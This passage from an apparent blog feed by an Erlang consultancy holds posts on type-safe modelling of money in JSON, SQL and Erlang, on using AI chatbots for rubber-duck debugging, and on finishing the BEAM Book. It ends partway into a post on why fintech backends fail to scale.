&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What is value here? Dollars? Euros? A discount rate? A tax multiplier?
Your system won’t tell you. It just stores whatever someone wrote last week.&lt;/p&gt;
&lt;p&gt;And since Mongo supports flexible updates, it’s easy to gradually evolve documents into inconsistent messes. One document has &amp;quot;amount&amp;quot;: &amp;quot;100&amp;quot;, another has amount: 100.0, and a third has:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-json&quot;&gt;{
  &amp;quot;amount&amp;quot;: { &amp;quot;value&amp;quot;:    10000,
              &amp;quot;currency&amp;quot;: &amp;quot;USD&amp;quot;,
              &amp;quot;unit&amp;quot;:    &amp;quot;cents&amp;quot; }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now your query logic needs to branch, and bugs start to breed.&lt;/p&gt;
&lt;h2 id=&quot;json-ubiquitous-and-ambiguous&quot; tabindex=&quot;-1&quot;&gt;JSON: Ubiquitous and Ambiguous&lt;/h2&gt;
&lt;p&gt;JSON is everywhere: in APIs, logs, NoSQL databases, Kafka streams, and config files. But it doesn’t support real numbers.&lt;/p&gt;
&lt;p&gt;JSON has one “number” type. There’s no distinction between:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Integer or float&lt;/li&gt;
&lt;li&gt;Decimal or exponential&lt;/li&gt;
&lt;li&gt;Currency, percent, duration, or count&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This means:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&amp;quot;amount&amp;quot;: 99.99 could be a float (in JS), a Decimal (in Python), or a BigDecimal (in Java)&lt;/li&gt;
&lt;li&gt;Many serializers silently round, truncate, or lose precision&lt;/li&gt;
&lt;li&gt;You can’t even tell if 99.99 is a valid business value without knowing the intended type&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Worse, many languages parse JSON numbers as floats by default. That means even if you store exact values, your application might read them imprecisely.&lt;/p&gt;
&lt;div class=&quot;blog-sidebar&quot;&gt;
&lt;h3&gt; COBOL-Structured but Not Safe&lt;/h3&gt;
One of the oldest languages still in use, &lt;b&gt;COBOL&lt;/b&gt;, often enforces more financial structure than many modern systems. Data is explicitly defined using `PIC` clauses:
&lt;pre&gt;&lt;code class=&quot;language-cobol&quot;&gt;05 AMOUNT         PIC 9(7)V99.  *&amp;gt; 9999999.99
05 CURRENCY-CODE  PIC X(3).     *&amp;gt; ISO-4217
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This enforces field width, scale, and sometimes even units by convention. No wonder that many banks still use COBOL.&lt;/p&gt;
&lt;p&gt;But COBOL lacks semantic typing; you get structure without meaning. Rigid, but still brittle when misunderstood.&lt;/p&gt;
&lt;/div&gt;
&lt;p&gt;You can’t trust what you can’t type.&lt;/p&gt;
&lt;h2 id=&quot;what-you-should-do-instead&quot; tabindex=&quot;-1&quot;&gt;What You Should Do Instead&lt;/h2&gt;
&lt;h3 id=&quot;typed-systems-are-better-systems&quot; tabindex=&quot;-1&quot;&gt;Typed systems are better systems.&lt;/h3&gt;
&lt;h4&gt;1.	Make units explicit&lt;/h4&gt;
&lt;p&gt;To encode 100.00 Euro:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-json&quot;&gt;{
  &amp;quot;amount&amp;quot;: 10000,
  &amp;quot;currency&amp;quot;: &amp;quot;EUR&amp;quot;,
  &amp;quot;minor_unit&amp;quot;: true
}
&lt;/code&gt;&lt;/pre&gt;
&lt;h4&gt;2.	Use the right types&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;Replace float with decimal&lt;/li&gt;
&lt;li&gt;Use real bool and datetime types&lt;/li&gt;
&lt;li&gt;Never store “truth” as &amp;quot;yes&amp;quot; or &amp;quot;Y&amp;quot;&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;3.	Model the domain&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;Create types like VatRate, TransactionAmount, IsoTimestamp&lt;/li&gt;
&lt;li&gt;Don’t let illegal states be representable&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;4.	Validate at the edges&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;APIs should reject ambiguity, not propagate it&lt;/li&gt;
&lt;li&gt;Fail fast when types or units are missing&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id=&quot;type-theory-briefly&quot; tabindex=&quot;-1&quot;&gt;Type Theory, Briefly&lt;/h3&gt;
&lt;p&gt;Types aren’t just for compilers. They encode meaning. They help humans and machines distinguish between:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;100 SEK vs 100%&lt;/li&gt;
&lt;li&gt;net_total vs gross_total&lt;/li&gt;
&lt;li&gt;sent_at vs due_date&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;Use types if you have them&lt;/h4&gt;
&lt;p&gt;In languages with strong type systems you can make these distinctions explicit:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-typescript&quot;&gt;// ISO 4217 currency codes (could use an enum)
type CurrencyCode = &#39;USD&#39; | &#39;EUR&#39; | &#39;GBP&#39; | &#39;JPY&#39;;

interface Money {
    // always in the smallest currency unit
    // (e.g. cents, pence)
  amountMinor: number;
  currency: CurrencyCode;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When done well, the compiler helps you prevent bugs. Your system becomes self-documenting and harder to misuse.&lt;/p&gt;
&lt;h4&gt;Fake types if you don&#39;t&lt;/h4&gt;
&lt;p&gt;Even in dynamically typed languages, you can fake it:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Use structs, classes, or schema validators&lt;/li&gt;
&lt;li&gt;Separate field names with intent (e.g. gross_eur_cents)&lt;/li&gt;
&lt;li&gt;Build linter rules that enforce domain conventions&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;An example in Erlang&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;%%%-----------------------------------------------------------------
%%% money.hrl - record definition
%%%-----------------------------------------------------------------
-record(money, {
    amount_minor :: integer(),     % always in minor units (cents, öre)
    currency     :: currency()     % ISO-4217 atom
}).

-type currency() :: usd | eur | gbp | sek.
-export_type([currency/0, money/0]).
-type money()    :: #money{}.
&lt;/code&gt;&lt;/pre&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;%%%-----------------------------------------------------------------
%%% money.erl
%%%-----------------------------------------------------------------
-module(money).
-compile([export_all]).  % concise for the demo

-include(&amp;quot;money.hrl&amp;quot;).

-spec new(integer(), currency()) -&amp;gt; money().
new(AmountMinor, Cur) when
        is_integer(AmountMinor),
        AmountMinor &amp;gt;= 0,
        Cur =:= usd; Cur =:= eur; Cur =:= gbp; Cur =:= sek -&amp;gt;
    #money{amount_minor = AmountMinor, currency = Cur}.

-spec add(money(), money()) -&amp;gt; money().
add(#money{currency = C, amount_minor = A1},
    #money{currency = C, amount_minor = A2}) -&amp;gt;
    #money{currency = C, amount_minor = A1 + A2};
add(_, _) -&amp;gt;
    error({currency_mismatch}).

-spec format(money()) -&amp;gt; binary().
format(#money{amount_minor = Amt, currency = Cur}) -&amp;gt;
    Major = Amt div 100,
    Minor = Amt rem 100,
    lists:flatten(io_lib:format(&amp;quot;~p.~2..0B ~p&amp;quot;, [Major, Minor, Cur])).
&lt;/code&gt;&lt;/pre&gt;
&lt;h4&gt;Or at least pretend&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;Naming-as-Type&lt;/em&gt;, when you really have nothing else.
If the tech stack is a bash script, SQL view, or low-code platform, fall back to semantic variable names:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-sql&quot;&gt;ALTER TABLE invoices
ADD COLUMN gross_eur_cents BIGINT NOT NULL,
ADD COLUMN vat_rate_pct   NUMERIC(5,2) NOT NULL;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now, in most modern SQL dialects you can use domains
and composite types to achieve type safety.&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-sql&quot;&gt;-- 1. A domain for minor-unit amounts (cents, öre, pence …)
CREATE DOMAIN minor_money
AS bigint                               -- large enough for 9 223 372 036 854 775 807 cents
CHECK (VALUE &amp;gt;= 0);

-- 2. A domain for currency codes (exactly three uppercase A-Z letters)
CREATE DOMAIN currency_code
AS char(3)
CHECK (VALUE ~ &#39;^[A-Z]{3}$&#39;);

-- 3. A composite type that glues the two together
CREATE TYPE money_value AS (
  amount_minor minor_money,
  currency     currency_code
);

-- 4. Example table using the new type
CREATE TABLE invoice_line (
  id           serial PRIMARY KEY,
  description  text NOT NULL,
  total_net    money_value NOT NULL,
  vat_amount   money_value NOT NULL,
  total_gross  money_value NOT NULL
);
&lt;/code&gt;&lt;/pre&gt;
&lt;pre&gt;&lt;code class=&quot;language-sql&quot;&gt;INSERT INTO invoice_line (description, total_net, vat_amount, total_gross)
VALUES
  (&#39;10 kg mozzarella&#39;,
   ROW(100000, &#39;EUR&#39;)::money_value,   -- €1 000.00 net
   ROW( 25000, &#39;EUR&#39;)::money_value,   -- €  250.00 VAT
   ROW(125000, &#39;EUR&#39;)::money_value);  -- €1 250.00 gross
&lt;/code&gt;&lt;/pre&gt;
&lt;h2 id=&quot;the-real-problem&quot; tabindex=&quot;-1&quot;&gt;The Real Problem&lt;/h2&gt;
&lt;p&gt;Modern languages make it easy to move fast without structure.
That’s fine in early prototypes. But financial systems are long-lived.
Without structure, every layer you build sits on sand.&lt;/p&gt;
&lt;p&gt;The cost? Every ambiguous field becomes a future incident.
Every vague type becomes a blocker to automation.&lt;/p&gt;
&lt;p&gt;You can pay that cost now; through type safety and clear structure.
Or you can pay it later; through failed audits, reconciliation hell, and broken trust.&lt;/p&gt;
&lt;h3 id=&quot;performance-myths&quot; tabindex=&quot;-1&quot;&gt;Performance Myths&lt;/h3&gt;
&lt;p&gt;If you&#39;re concerned about throughput or message size: remember that using JSON or XML already dwarfs the overhead of a type‑safe add(Money) function.&lt;/p&gt;
&lt;p&gt;Machine‑level addition is fast, but the bugs caused by mixing currencies or losing precision will cost far more.&lt;/p&gt;
&lt;h2 id=&quot;closing-thought&quot; tabindex=&quot;-1&quot;&gt;Closing Thought&lt;/h2&gt;
&lt;p&gt;Finance runs on trust.
Trust requires clarity.
Clarity requires types.&lt;/p&gt;
&lt;p&gt;If you’re still shipping Excel-style data into your APIs, databases, and ledgers then you’re shipping risk.&lt;/p&gt;
&lt;p&gt;Typed data isn’t a nice-to-have.
It’s a trust contract.&lt;/p&gt;
&lt;hr /&gt;
&lt;p&gt;I barely scratched the surface here. For related material on how bad architecture compounds these problems, see &lt;a href=&quot;https://happihacking.com/blog/posts/2025/payment_architecture/&quot;&gt;The Hidden Cost of Bad Payment Architecture&lt;/a&gt;. For a practical look at how Erlang handles these workloads at scale, see &lt;a href=&quot;https://happihacking.com/blog/posts/2024/erlang_for_fintech/&quot;&gt;How Erlang Powers High-Volume Finance&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;If you&#39;d like deeper material, whether a full book or a hands-on course, please let me know.&lt;/p&gt;
&lt;hr /&gt;
&lt;p&gt;Need a second pair of eyes on your data contracts or payment architecture?
&lt;strong&gt;Let’s talk → &lt;a href=&quot;mailto:info@happihacking.se&quot;&gt;info@happihacking.se&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>AI Rubber Ducking: When Your Duck Starts Talking Back</title>
    <link href="https://happihacking.com/blog/posts/2025/ai_duck/"/>
    <updated>2025-04-01T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2025/ai_duck/</id>
    <summary>Debugging with an AI duck, helpful, but slightly quackers</summary>
    <content type="html">&lt;h1 id=&quot;ai-rubber-ducking-when-your-duck-starts-talking-back&quot; tabindex=&quot;-1&quot;&gt;AI Rubber Ducking: When Your Duck Starts Talking Back&lt;/h1&gt;
&lt;p&gt;We’ve all been there. Your code isn’t working, you&#39;re on your third coffee, and explaining your logic out loud to a literal rubber duck somehow feels perfectly reasonable. This method-known as &amp;quot;rubber duck debugging&amp;quot;-forces you to verbalize the problem, turning vague frustration into clear insight. But what if, instead of silent, judgmental stares, your rubber duck could actually respond?&lt;/p&gt;
&lt;p&gt;&lt;img class=&quot;img-blog&quot; src=&quot;https://happihacking.com/images/rubberducking.jpg&quot; alt=&quot;Me pointing at a computer with a rubber duck on the side.&quot; title=&quot;Me pointing at a computer with a rubber duck on the side.&quot; /&gt;&lt;/p&gt;
&lt;h2 id=&quot;rubber-duck-debugging-briefly-explained&quot; tabindex=&quot;-1&quot;&gt;Rubber Duck Debugging, Briefly Explained&lt;/h2&gt;
&lt;p&gt;If you&#39;ve never heard of rubber duck debugging, here’s the gist: you talk your code through line-by-line to an inanimate duck (or a coffee mug, or a slightly confused co-worker). The mere act of explaining forces your brain to slow down, reconsider assumptions, and often leads you straight to the source of the problem.&lt;/p&gt;
&lt;p&gt;Now, enter AI.&lt;/p&gt;
&lt;h2 id=&quot;ai-joins-the-debugging-party&quot; tabindex=&quot;-1&quot;&gt;AI Joins the Debugging Party&lt;/h2&gt;
&lt;p&gt;AI-powered tools like ChatGPT have started stepping in as your conversational coding partner. Instead of blank stares from a rubber toy, you now get questions, clarifications, and the occasional helpful nudge from an attentive AI. This might sound great, or terrifyingly close to &amp;quot;AI writes your code for you,&amp;quot; but that&#39;s not quite the point.&lt;/p&gt;
&lt;p&gt;Here&#39;s a crucial distinction: &lt;strong&gt;this is not about letting AI blindly spit out code snippets for you to paste without thinking&lt;/strong&gt;. That way lies madness, chaos, and production incidents at 3 AM. Instead, it’s about enhancing your understanding of the code you&#39;re writing, using the AI as a thoughtful listener who challenges your assumptions and gently prods you toward insight.&lt;/p&gt;
&lt;h2 id=&quot;why-letting-ai-write-your-code-is-a-terrible-idea&quot; tabindex=&quot;-1&quot;&gt;Why Letting AI Write Your Code Is a Terrible Idea&lt;/h2&gt;
&lt;p&gt;Let’s pause briefly to clarify something important:&lt;/p&gt;
&lt;p&gt;Yes, AI can generate code. Sometimes it&#39;s even correct. But if you blindly copy-paste AI-generated code, you’ve basically summoned a gremlin into your codebase. Good luck debugging a solution generated by a statistical model trained on half the internet’s JavaScript hacks and Stack Overflow workarounds.&lt;/p&gt;
&lt;p&gt;Instead, the real power of using AI for rubber duck debugging is helping you articulate your problem and thought process. You remain in charge. It&#39;s your logic, your code. But now you have a conversational partner to bounce ideas off.&lt;/p&gt;
&lt;h2 id=&quot;how-ai-ducking-helps-you-the-developer&quot; tabindex=&quot;-1&quot;&gt;How AI Ducking Helps You (the Developer)&lt;/h2&gt;
&lt;p&gt;Here&#39;s why chatting with an AI rubber duck is surprisingly effective:&lt;/p&gt;
&lt;p&gt;Explaining your problem in detail forces clarity. When you describe your bug or logical flaw to an AI, you have to strip away assumptions and present things simply. By doing this, you immediately spot those sneaky gaps or logical inconsistencies.&lt;/p&gt;
&lt;p&gt;The AI’s questions can prompt you to think about your code differently. Rather than just silently nodding along, an AI can gently interrupt your flow and say something like, &amp;quot;Wait, what happens if &lt;code&gt;x&lt;/code&gt; is empty?&amp;quot; Suddenly you&#39;re forced to consider edge cases or logic branches you&#39;ve overlooked.&lt;/p&gt;
&lt;p&gt;It’s always there, awake, caffeinated (in the digital sense), and ready to debug with you,even when your team isn&#39;t. No more waiting until morning to untangle the mess you made at 2 AM.&lt;/p&gt;
&lt;h2 id=&quot;practical-tips-for-using-ai-as-a-rubber-duck&quot; tabindex=&quot;-1&quot;&gt;Practical Tips for Using AI as a Rubber Duck&lt;/h2&gt;
&lt;p&gt;Here’s how to best leverage AI in your debugging sessions:&lt;/p&gt;
&lt;p&gt;First, clearly articulate your issue: what should your code do, and what is it actually doing? Imagine you’re explaining it to someone who has no context at all.&lt;/p&gt;
&lt;p&gt;Next, provide only relevant snippets, enough context without drowning your duck in noise. This helps maintain your own clarity too.&lt;/p&gt;
&lt;p&gt;Finally, actively engage with the AI’s questions and suggestions. Don&#39;t just ask for answers, but use the dialogue to challenge your own assumptions and deepen your understanding.&lt;/p&gt;
&lt;h3 id=&quot;suggested-prompts&quot; tabindex=&quot;-1&quot;&gt;Suggested prompts&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Problem Description Prompts&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&amp;quot;Let me explain this code snippet to you. Point out any logical inconsistencies or gaps in my explanation.&amp;quot;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&amp;quot;Here&#39;s what I want my function to do [short description]. Here’s how I&#39;m approaching it. What scenarios might I have missed?&amp;quot;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Code Understanding Prompts&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&amp;quot;Can you restate the logic of my code snippet in simpler terms? I want to see if I clearly understand what I&#39;ve written.&amp;quot;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&amp;quot;Let me describe how this should work step-by-step. Please interrupt if something doesn’t make sense or seems incomplete.&amp;quot;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Edge-Case Identification Prompts&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&amp;quot;I think I&#39;ve covered all edge cases. Challenge me-are there conditions I haven’t accounted for?&amp;quot;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&amp;quot;I feel confident about my implementation. Double-check me: are there scenarios I might have overlooked?&amp;quot;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Debugging Assistance Prompts&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&amp;quot;My code isn&#39;t working. Before giving suggestions, ask me clarifying questions to help me understand why it might be failing.&amp;quot;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&amp;quot;Ask me about assumptions I&#39;ve made in this code snippet. Help me realize what I might be taking for granted.&amp;quot;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Or you can try my &lt;a href=&quot;https://chatgpt.com/g/g-67eba815fd4081919181e486d2ad08cc-rubber-duck-debugger&quot;&gt;Rubber Duck Debugger&lt;/a&gt;&lt;/p&gt;
&lt;h2 id=&quot;conclusion-or-embrace-the-quack&quot; tabindex=&quot;-1&quot;&gt;Conclusion (Or, Embrace the Quack)&lt;/h2&gt;
&lt;p&gt;AI-powered rubber ducking won&#39;t replace traditional debugging or your team’s code reviews. But it does offer a helpful middle ground between coding alone and having a conversation partner always available. The goal is not about magically solving your problems, but about helping &lt;em&gt;you&lt;/em&gt; understand your problems clearly enough to fix them yourself.&lt;/p&gt;
&lt;p&gt;So next time your code misbehaves, try talking it through with an AI duck. It might just quack you up, and lead you straight to the solution.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>The BEAM Book Is Almost Done. Here&#39;s What Writing It Taught Me.</title>
    <link href="https://happihacking.com/blog/posts/2025/the_beam_book_lessons/"/>
    <updated>2025-03-25T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2025/the_beam_book_lessons/</id>
    <summary>Reflections on scope, clarity, and the joys of letting go.</summary>
    <content type="html">&lt;h1 id=&quot;the-project-nears-completion&quot; tabindex=&quot;-1&quot;&gt;The Project Nears Completion&lt;/h1&gt;
&lt;p&gt;I set out to document everything I knew about the BEAM, and to discover everything I didn&#39;t yet know.
I thought it would be straightforward: outline the architecture, show some code, sprinkle in a few anecdotes. Then I discovered how challenging it is to make concurrency, schedulers, and message passing sound simple.&lt;/p&gt;
&lt;a href=&quot;https://github.com/happi/theBeamBook/releases/latest/&quot;&gt;
&lt;img class=&quot;img-blog&quot; src=&quot;https://happihacking.com/images/simplicity.jpg&quot; alt=&quot;A complex pipe system from my heater.&quot; title=&quot;A complex pipe system from my heater.&quot; /&gt;&lt;/a&gt;
&lt;p&gt;The manuscript is now nearly complete. I’m fine-tuning the final chapters and making sure the structure doesn’t collapse under its own ambition. It turns out, writing about concurrency requires you to manage your own concurrency crisis: the steady flood of ideas vs. the reality of limited pages and time.&lt;/p&gt;
&lt;h1 id=&quot;clarity-over-complexity&quot; tabindex=&quot;-1&quot;&gt;Clarity Over Complexity&lt;/h1&gt;
&lt;p&gt;Early drafts tried to cover every corner case. I believed completeness was the gold standard. But readers gravitated to the simpler chapters, the ones that made a single concept click. I realized that the trick to explaining concurrency is being hyper-focused on practical examples, then trusting readers to explore deeper if they choose. If I can’t make a concept accessible to a motivated beginner, maybe I don’t understand it well enough.&lt;/p&gt;
&lt;p&gt;It turns out there were quite a few of those concepts...&lt;/p&gt;
&lt;h1 id=&quot;reigning-in-the-tools&quot; tabindex=&quot;-1&quot;&gt;Reigning in the Tools&lt;/h1&gt;
&lt;p&gt;At one point, I considered writing entire sections on every tracing flag, every debug mode, and every esoteric performance trick. The problem is that readers don’t need an encyclopedia; they need reasons. Tracing is important because you suspect a race condition. Profiling matters because you’re chasing a sneaky performance bottleneck. Tools are only interesting when they solve real problems, so that became my new guiding principle.&lt;/p&gt;
&lt;h1 id=&quot;ruthless-scoping&quot; tabindex=&quot;-1&quot;&gt;Ruthless Scoping&lt;/h1&gt;
&lt;p&gt;I had to remove or postpone entire topics: dirty schedulers, advanced NIF usage, and extended ERTS internals. They’re fascinating but not essential to the book’s main goal. Each time I felt guilty about cutting something, I remembered that overwhelming readers helps no one. The hardest part of writing isn’t the explaining, it’s choosing what to leave out.&lt;/p&gt;
&lt;h1 id=&quot;final-touches&quot; tabindex=&quot;-1&quot;&gt;Final Touches&lt;/h1&gt;
&lt;p&gt;I’m wrapping up the final chapters, polishing details around logging and monitoring to reflect the latest OTP releases. The open source version is already up on GitHub under Creative Commons, where I push new updates as soon as they’re ready.&lt;/p&gt;
&lt;p&gt;See &lt;a href=&quot;https://github.com/happi/theBeamBook&quot;&gt;theBeamBook&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Once the manuscript feels rock-solid, I’ll bundle it into a formal 1.0 release. A print edition will follow for those who still enjoy the feel of paper or need something sturdy to stop the table from wobbling.&lt;/p&gt;
&lt;a href=&quot;https://blog.stenmans.org/theBeamBook/&quot;&gt;
&lt;img class=&quot;img-blog&quot; src=&quot;https://happihacking.com/images/beam_book_cover.png&quot; alt=&quot;A draft of the cover for the beam book.&quot; title=&quot;A draft of the cover for the beam book.&quot; /&gt;&lt;/a&gt;
&lt;h1 id=&quot;how-you-can-help&quot; tabindex=&quot;-1&quot;&gt;How You Can Help&lt;/h1&gt;
&lt;p&gt;If you’ve skimmed any parts of the work or tried some examples, I welcome your feedback. Tell me if something is too dense, too vague, or too boring. Yes, that last category is real, and I’d rather know before the book hits the press.&lt;/p&gt;
&lt;h1 id=&quot;conclusion&quot; tabindex=&quot;-1&quot;&gt;Conclusion&lt;/h1&gt;
&lt;p&gt;Writing this book taught me to finally stop adding things, cut what&#39;s unnecessary, and accept when it&#39;s good enough.&lt;/p&gt;
&lt;p&gt;If the book helps someone troubleshoot a gnarly bug or finally understand why the BEAM is so special, it&#39;s done its job. For the full story behind the decade-long writing process, see &lt;a href=&quot;https://happihacking.com/blog/posts/2025/why_I_wrote_theBEAMBook/&quot;&gt;Why I Wrote the BEAM Book&lt;/a&gt;. For the broader context of BEAM&#39;s evolution over the decades, see &lt;a href=&quot;https://happihacking.com/blog/posts/2023/erlang-history/&quot;&gt;Three Decades with Erlang&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Thanks to everyone who has shared feedback and encouragement along the way. You’ve shaped this project more than you know. And if you discover something confusing, or you see a spot where you’d love more detail, let me know before I release the final print version. Writing about concurrency is fun, but improving it with your input is even better.&lt;/p&gt;
&lt;p&gt;Want a heads-up when the print version drops? Just email &lt;a href=&quot;mailto:info@happihacking.se&quot;&gt;info@happihacking.se&lt;/a&gt; and I’ll add you to the list.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Why Some Fintechs Scale Seamlessly; and Others Crash and Burn</title>
    <link href="https://happihacking.com/blog/posts/2025/fintech_fails/"/>
    <updated>2025-03-18T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2025/fintech_fails/</id>
    <summary>Most fintech backends break under pressure. Yours doesn&#39;t have to.</summary>
    <content type="html">&lt;p&gt;Fintech is a ruthless game. When your backend crashes, the consequences are serious. Transactions freeze, customers panic, and regulators start sending you very unfriendly letters.&lt;/p&gt;
&lt;p&gt;I&#39;ve spent decades building financial backends, from &lt;a href=&quot;https://happihacking.com/blog/posts/2023/Installment_plans/&quot;&gt;Klarna&#39;s early days&lt;/a&gt; to scaling systems for companies like RedCare, Aeternity, &lt;a href=&quot;https://happihacking.com/blog/posts/2023/iot_pipeline/&quot;&gt;Deutsche Telekom&lt;/a&gt;, and &lt;a href=&quot;https://happihacking.com/blog/posts/2023/delta/&quot;&gt;Delta Exchange&lt;/a&gt;. The secret to successful fintech scaling involves performance and compliance in equal measure.&lt;/p&gt;
&lt;p&gt;Let’s unpack why fintech backends break and how smart companies keep everything running smoothly.&lt;/p&gt;
&lt;h2 id=&quot;epic-scaling-fails-and-what-we-can-learn&quot; tabindex=&quot;-1&quot;&gt;Epic Scaling Fails (And What We Can Learn)&lt;/h2&gt;
&lt;h3 id=&quot;solaris-bank-fast-growth-meets-regulatory-nightmare&quot; tabindex=&quot;-1&quot;&gt;Solaris Bank: Fast Growth Meets Regulatory Nightmare&lt;/h3&gt;
&lt;p&gt;Solaris Bank exploded in popularity as a banking-as-a-service platform. Unfortunately, they moved so quickly they left compliance behind. Germany&#39;s BaFin eventually stepped in, banning new customer sign-ups and slapping Solaris with a €6.5M fine.&lt;/p&gt;
&lt;p&gt;Compliance should be the foundation of your fintech strategy, not something you add later.&lt;/p&gt;
&lt;h3 id=&quot;n26-growth-gone-wild&quot; tabindex=&quot;-1&quot;&gt;N26: Growth Gone Wild&lt;/h3&gt;
&lt;p&gt;N26 scaled rapidly but overlooked crucial anti-money-laundering systems. Regulators capped their growth at 50,000 new customers per month and handed them a painful €9.2M fine.&lt;/p&gt;
&lt;p&gt;This illustrates clearly that technology and compliance need to scale simultaneously.&lt;/p&gt;
&lt;h3 id=&quot;trustly-the-ipo-that-never-happened&quot; tabindex=&quot;-1&quot;&gt;Trustly: The IPO That Never Happened&lt;/h3&gt;
&lt;p&gt;Trustly faced major issues due to weak customer verification processes, especially in gambling transactions. As a result, they received an €11M fine, and their highly anticipated IPO was canceled.&lt;/p&gt;
&lt;p&gt;Transaction volume alone doesn&#39;t guarantee success without solid compliance systems.&lt;/p&gt;
&lt;h3 id=&quot;swish-even-giants-can-trip&quot; tabindex=&quot;-1&quot;&gt;Swish: Even Giants Can Trip&lt;/h3&gt;
&lt;p&gt;Swish, a well-established fintech service, recently encountered several disruptions. On Christmas Eve (December 24-25, 2024), Swish suffered significant downtime during peak hours, causing issues for more than 24 hours. Additional problems included temporary outages affecting Skandiabanken transactions (March 18, 2025), an ECB-related downtime (March 5, 2025), API disruptions linked to Swedbank Pay (January 20 and March 11, 2025), and a brief 15-minute outage (July 1, 2024).&lt;/p&gt;
&lt;p&gt;These cases underscore the necessity of robust monitoring and clear communication channels.&lt;/p&gt;
&lt;h2 id=&quot;how-smart-fintechs-scale-smoothly&quot; tabindex=&quot;-1&quot;&gt;How Smart Fintechs Scale Smoothly&lt;/h2&gt;
&lt;p&gt;Successful fintechs follow clear strategies to achieve seamless growth.&lt;/p&gt;
&lt;h3 id=&quot;delta-exchange-compliance-at-high-speed&quot; tabindex=&quot;-1&quot;&gt;Delta Exchange: Compliance at High Speed&lt;/h3&gt;
&lt;p&gt;Delta Exchange scaled their crypto platform smoothly despite intense regulatory oversight. They built compliance directly into their backend, processing over $300M daily trades and onboarding 100,000 users without issues.&lt;/p&gt;
&lt;p&gt;Compliance is integral for both speed and stability.&lt;/p&gt;
&lt;h3 id=&quot;finoa-making-compliance-an-advantage&quot; tabindex=&quot;-1&quot;&gt;Finoa: Making Compliance an Advantage&lt;/h3&gt;
&lt;p&gt;Finoa integrated compliance deeply into their systems from day one. This allowed them to effortlessly navigate stringent German regulations, secure full BaFin licensing, attract institutional clients, and secure a €15M funding round.&lt;/p&gt;
&lt;p&gt;Here, compliance actively supports growth instead of hindering it.&lt;/p&gt;
&lt;h3 id=&quot;sika-health-automated-compliance&quot; tabindex=&quot;-1&quot;&gt;Sika Health: Automated Compliance&lt;/h3&gt;
&lt;p&gt;Sika Health successfully automated complex healthcare payment compliance processes. They quickly onboarded thousands of users without any regulatory fines or operational delays.&lt;/p&gt;
&lt;p&gt;Automation of compliance processes simplifies scaling significantly.&lt;/p&gt;
&lt;h2 id=&quot;essential-steps-for-every-fintech-cto&quot; tabindex=&quot;-1&quot;&gt;Essential Steps for Every Fintech CTO&lt;/h2&gt;
&lt;p&gt;Scaling a fintech backend &lt;strong&gt;can&lt;/strong&gt; be straightforward, &lt;strong&gt;if handled correctly.&lt;/strong&gt; The key is to &lt;strong&gt;anticipate growth before it happens&lt;/strong&gt;, design for &lt;strong&gt;extreme reliability&lt;/strong&gt;, and embed &lt;strong&gt;compliance into the architecture&lt;/strong&gt; from day one.&lt;/p&gt;
&lt;p&gt;Here’s what every &lt;strong&gt;fintech CTO needs to prioritize&lt;/strong&gt; to avoid downtime, compliance fines, and customer trust loss.&lt;/p&gt;
&lt;hr /&gt;
